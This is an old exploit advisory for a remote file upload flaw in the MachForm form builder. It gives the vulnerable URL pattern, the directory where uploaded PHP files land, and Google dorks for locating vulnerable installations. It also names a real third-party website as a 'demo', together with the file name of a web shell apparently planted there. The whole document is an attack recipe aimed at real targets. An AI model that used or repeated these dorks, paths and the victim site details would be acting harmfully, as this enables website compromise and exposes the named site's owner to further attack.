MachForm suffers form a remote shell upload vulnerability. Note that this finding houses site-specific data.
fc6ad89bb51317725acbfd9f8605acf89f178c4d83d2ac59c3418693d7002025
**************************************************************************************************
| @@@@@@@@ @@@@@@@@@ @@ @@ @@@@@ @@ @@ @@@@@@@@ |
| @ @ @ @ @ @ @ @ @ @ @ @ @ |
| @ @ @ @ @ @ @ @ @ @ @ @ @ |
| @ @ @@@ @ @ @ @ @ @ @ @ @ @ @ |
| @@@@@@@@ @@@ @@@ @ @ @ @ @ @ @ @ @ @@@@@@@@ |
| @ @ @ @ @ @ @ @ @ @ @ @ @ |
| @ @ @ @ @ @ @ @ @ @ @ @ @ |
| @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ |
| @@@@@@@@ @ @ @ @ @ @@@@@ @ @ @ @@@ @@@@@@@@ |
**************************************************************************************************
==================================================================================================
# [~] Exploit Title: MachForm RFU Bug #
# [~] Google Dork (For RFU) : " Bottom Of The Exploit " #
# [~] Date: 09/11/2012 (TU) #
# [~] Exploit Author: Samim.s #
# [~] Version: ALL Versions & ALL Languages #
# [~] Tested on: Se7en & BT5 #
# [~] Support WebSite : MachForm.com #
==================================================================================================
# [+] RFU Exploit : #
# http://WebSite.Com/[path]/view.php?id=X <~~ X = Number #
# [+] Demo : #
# http://www.birchgate.ca/machform/view.php?id=2 <~~ You Can Upload .PHP Files #
# #
# [+] Uploaded Files Address : #
# http://WebSite.Com/[path]/data/form_X/files/ <~~ X = ID #
# [+] Demo : #
# http://www.birchgate.ca/machform/data/form_2/files/ #
# Shell Address : element_6_900ebef8bf2f2a73e6af22a2251e039c-197-Samim.s.php # #
# ---------------------------------------------------------------------------------------------- #
# [+] Dorks : #
# intitle:"index of /form/data/*/files/" #
# inurl:"/form/view.php?id=" intext:"upload" #
==================================================================================================
# [*] GreetZ To: Mr.XpR - UnknowN - Mr.EBI - SaMaN.BiLiZ & All IRaNHaCK Member + Iranian HaCkerZ #
==================================================================================================